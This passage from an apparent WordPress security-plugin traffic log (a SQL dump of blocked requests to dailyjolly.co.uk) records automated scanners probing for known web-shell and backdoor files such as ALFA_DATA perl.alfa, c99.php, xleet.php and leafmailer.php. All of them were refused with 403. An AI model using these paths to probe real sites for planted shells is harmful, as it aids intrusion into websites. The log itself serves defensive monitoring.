3.5.30729)\"}','zdmpjk1ghFvOZq5S7QYRswxL',0,1674413310.0097,504,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/olux.php?http://dailyjolly.co.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Nr1EWR0pgDj5sTuz9aXnZl36',0,1674413315.9537,334,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-info.php?http://dailyjolly.co.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oceABdfhIs5rqv7N0XtzSRWH',0,1674413323.0339,710,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xl.php?http://dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SwlaYKmr70xLQPtnDCG4RUu3',0,1674413329.2676,723,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-confiig.php?http://dailyjolly.co.uk/wp-confiig.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ONsWq2izPJy1GSvKdZbkRljY',0,1674413337.8682,477,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/file-manager.php?http://dailyjolly.co.uk/file-manager.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X4TC1kuDbeHnQWZ8ESriq5MV',0,1674413343.3081,698,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/uploader.php?http://dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CkTK0sUZaolYy9WXfrSQm6R2',0,1674413351.0902,407,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leafmailer.php?http://dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KdaGQ9uij5cHyMbP74EDertA',0,1674413357.5816,252,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xwzEUWHMKgadBGnslA5qpFc4',0,1674413364.0851,269,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KM2Y5PhnQLX8E7Wx0Idvpwak',0,1674413370.1782,475,'','GET',403,0,700,0,1,'',0);
INSERT INTO `cerber_traffic` VALUES ('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/tmp_images/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/tmp_images/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','08lguVy9bQTPSnjUfdH4YmN7',0,1674413380.2655,1536,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-admin/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7QvNYOCLIoF3KTu2qMVD1eaZ',0,1674413385.9918,298,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-content/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E5nPzrKi2sTUv83AHCytc6Lp',0,1674413392.6048,351,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-includes/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KnJ2PDe0kLMR7STsFaEOq4c3',0,1674413396.2551,387,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JjiarFK1X4UOhfEeDv8TW3AR',0,1674413401.9982,516,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','d3QrkOUzqW7ui0wJnG6BSbF2',0,1674413407.2225,303,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/files/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/files/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HjRazN9lL2TtYZEeCMyP5kVO',0,1674413414.5694,297,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8uYHRPcCwlTnhFvG7jSdoUaK',0,1674413418.9202,271,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa%22?http://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa%22','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','biVWFUPzkN587SlrOhTjDsAo',0,1674413424.8957,345,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IdTf70QbR9BXwuDs4EvnYOAt',0,1674413434.1412,381,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','y5iG6gmFMCx3zf8tohBuHT9Z',0,1674413440.1240,296,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa?http://dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IFSXP1ZyvL7wdVglr3z6sbC5',0,1674413449.1925,521,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=crypted','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/plugins\\/apikey\\/apikey.php?test=crypted\"}','872LoSy6xbe9qksFZahmMdiz',0,1674417643.5237,219,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/hpNlC.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/ALFA_DATA\\/alfacgiapi\\/hpNlC.php\"}','qlmx23iaj5pwuhgGyRWQ4YtP',0,1674417649.0330,195,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/cyz.php?cyz=Fams','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/cyz.php?cyz=Fams\"}','GIULCBxrYVm0ifD6QldMK57X',0,1674417654.0235,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/HGlsX.php?zero=root','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/HGlsX.php?zero=root\"}','Jpmq1rgQe4aznAPNVBvGj56Z',0,1674417654.0214,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/S7UfQilj.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-content\\/plugins\\/dzs-zoomsounds\\/S7UfQilj.php\"}','5osyeruKnOaT84cJflUkbVF0',0,1674417654.0297,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/hpNlC.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/css\\/ALFA_DATA\\/alfacgiapi\\/hpNlC.php\"}','4Crb1aTkldE8BgHPO7YiyoXn',0,1674417664.4414,226,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/cyz.php?cyz=Fams','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/cyz.php?cyz=Fams\"}','K6s10Hj5GV4ehFDcAx3aigm8',0,1674417669.8901,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/alfacgiapi/hpNlC.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/alfacgiapi\\/hpNlC.php\"}','1Em23Zeyhz794PfQNSuAp8UI',0,1674417670.8352,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/cyz.php?cyz=Fams','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/cyz.php?cyz=Fams\"}','5jsy1QxLGqV8cn3gh2bvJRYd',0,1674417676.5563,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hM48vZ7Tqt3NYlyURJWAepBm',0,1674426449.8600,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tvFMuYejTrgPws4NDmoX13Hk',0,1674426450.7307,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mvQB3efAUZ5wlFitzJNKpWE6',0,1674426451.6116,275,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xKPedHZlSz9VoTp8uj1IaE6R',0,1674426452.6022,428,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YXUB7FtNLCcxOm4beTp9q56R',0,1674426453.7494,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gBHmwOeL47yMa8CpNzbDFXd0',0,1674426454.6966,185,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','I1ZGWiTMBhaNwC3cH4EQs8zu',0,1674426455.5722,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Gd2RTgX5AuLD9r6HM03ji1oK',0,1674426456.4719,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lZomswViJextR712dpvbHTEB',0,1674426457.3436,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tyou3gUrDq9bdQWzvLOV28YB',0,1674426458.2040,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pZ3N7VJsxBq5uAkUvnrMChzb',0,1674426459.1047,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LnxzDZ4BgvetYcfpWoRGVmUh',0,1674426459.9825,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AO6tVpKB5QE2lyRZSjgov1hc',0,1674426460.8650,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VrWF6wlm01zjNptDX8nfY93P',0,1674426461.7642,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o1mjEe7WbwHXhn6Nx5taskc0',0,1674426462.6419,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Mwa9m1O7YQLfcqnvKAE04Pys',0,1674426463.5290,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XmON3KpPJxkMnFqtgQWa6edG',0,1674426464.3900,223,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','trlLe6FOi7yASVYjmE5Ka24N',0,1674426465.3143,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HRqGhlLp9aP1Y4eIfvcUXDAE',0,1674426466.2285,187,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','H7FC9GwLKxoiY1vVfzndj6cl',0,1674426467.1236,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ziOlQoaZnhTsbr1vDMeBtU3A',0,1674426468.0256,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IByDYWGVSauQZAw79rvK2nLj',0,1674426468.8969,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','r6e8GSAT45vcojWZ3iQpwsn2',0,1674426469.7627,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BcusgIOdzCWnNZ658re7UPkQ',0,1674426470.6352,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','miGJsDcF4YhE3H7xN9f2d0Qy',0,1674426471.5195,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','89051okM4WblryvDViG3ZBnU',0,1674426472.4152,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bFludUqCLkr4aVfs7WDtjcP8',0,1674426473.2998,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jcYyKDxSlVIN8gtMPFnTerEb',0,1674426474.2118,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','w6R8bN0P4eGByvlWphZMJqEs',0,1674426475.0918,198,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TFfxWQrAUnNtvlKzL9p8D13R',0,1674426476.0013,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZlkjabeWXyLfQ26AU4ntM9Dg',0,1674426476.8835,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uL71qv5MCmoc6B2PHVWSGnaf',0,1674426477.7560,182,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SJHo71UXq8YxNyBzlwsjCgI5',0,1674426478.6221,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','R7V8Z4tJy2heOUipj0LWFK6o',0,1674426479.4666,213,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x6LyFNkdelRTsDICE20J3WMo',0,1674426480.3748,218,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IukQHc95d2rxlM7WnK1iOXf6',0,1674426481.3790,187,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nCqeDuaRKjJ6z57UMXoZBfN2',0,1674426482.2565,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kp4oDHUSdEmcWGq78nQM20we',0,1674426483.1333,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X2Jfwu8mNkW7rzA1xIiS3TlZ',0,1674426483.9935,226,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tsbZEvixRK1Ncu0FaeYSTP5k',0,1674426484.9163,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','a9nYjwLomzkMbQ3ChDO25i1d',0,1674426485.8086,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OVC7eIdENjza2tnyq5BFKoA8',0,1674426486.7355,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ISe4gyV3t5quXGNDdoLk1Fns',0,1674426487.6070,226,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2ZLpfYwex6uMjP395RNzlgVI',0,1674426488.5389,218,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 